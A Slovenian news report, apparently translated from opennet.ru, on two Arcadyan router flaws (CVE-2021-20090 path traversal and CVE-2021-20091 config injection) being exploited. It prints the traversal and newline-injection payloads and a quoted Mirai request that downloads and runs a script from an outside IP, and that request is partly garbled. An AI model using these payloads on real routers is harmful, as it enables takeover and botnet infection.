V omrežju so zabeležili ogromen napad na domače usmerjevalnike, katerih programska oprema uporablja implementacijo strežnika HTTP podjetja Arcadyan. Za pridobitev nadzora nad napravami se uporablja kombinacija dveh ranljivosti, ki omogoča oddaljeno izvajanje poljubne kode s korenskimi pravicami. Težava zadeva dokaj široko paleto usmerjevalnikov ADSL proizvajalcev Arcadyan, ASUS in Buffalo ter naprav, dobavljenih pod blagovnimi znamkami Beeline (težava je potrjena v Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone in drugih telekomunikacijskih operaterjev. Ugotovljeno je, da je težava prisotna v programski opremi Arcadyan že več kot 10 let in se je v tem času uspela preseliti na vsaj 20 modelov naprav 17 različnih proizvajalcev.
Prva ranljivost, CVE-2021-20090, omogoča dostop do katerega koli skripta spletnega vmesnika brez preverjanja pristnosti. Bistvo ranljivosti je v tem, da so v spletnem vmesniku nekateri imeniki, prek katerih se pošiljajo slike, datoteke CSS in skripti JavaScript, dostopni brez avtentikacije. V tem primeru se imeniki, za katere je dovoljen dostop brez avtentikacije, preverijo z začetno masko. Vdelana programska oprema blokira navajanje znakov »../« v poteh za dostop do nadrejenega imenika, uporaba kombinacije »..%2f« pa je preskočena. Tako je mogoče odpreti zaščitene strani, ko pošiljate zahteve, kot je “http://192.168.1.1/images/..%2findex.htm”.
Druga ranljivost, CVE-2021-20091, omogoča preverjenemu uporabniku, da spremeni sistemske nastavitve naprave s pošiljanjem posebej oblikovanih parametrov skriptu apply_abstract.cgi, ki ne preveri prisotnosti znaka za novo vrstico v parametrih. . Na primer, ko izvaja operacijo ping, lahko napadalec poda vrednost “192.168.1.2%0AARC_SYS_TelnetdEnable=1” v polju z naslovom IP, ki se preverja, in skriptom, ko ustvarja datoteko z nastavitvami /tmp/etc/config/ .glbcfg, bo vanjo zapisal vrstico “AARC_SYS_TelnetdEnable=1”, ki aktivira strežnik telnetd, ki omogoča neomejen dostop ukazne lupine s korenskimi pravicami. Podobno lahko z nastavitvijo parametra AARC_SYS izvedete katero koli kodo v sistemu. Prva ranljivost omogoča zagon problematičnega skripta brez preverjanja pristnosti z dostopom do njega kot »/images/..%2fapply_abstract.cgi«.
Za izkoriščanje ranljivosti mora biti napadalec sposoben poslati zahtevo na omrežna vrata, na katerih se izvaja spletni vmesnik. Sodeč po dinamiki širjenja napada, mnogi operaterji pustijo dostop do svojih naprav iz zunanjega omrežja, da poenostavijo diagnozo težav s strani podporne službe. Če je dostop do vmesnika omejen samo na notranje omrežje, se napad lahko izvede iz zunanjega omrežja s tehniko »rebinding DNS«. Ranljivosti se že aktivno uporabljajo za povezovanje usmerjevalnikov z botnetom Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Povezava: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Vir: opennet.ru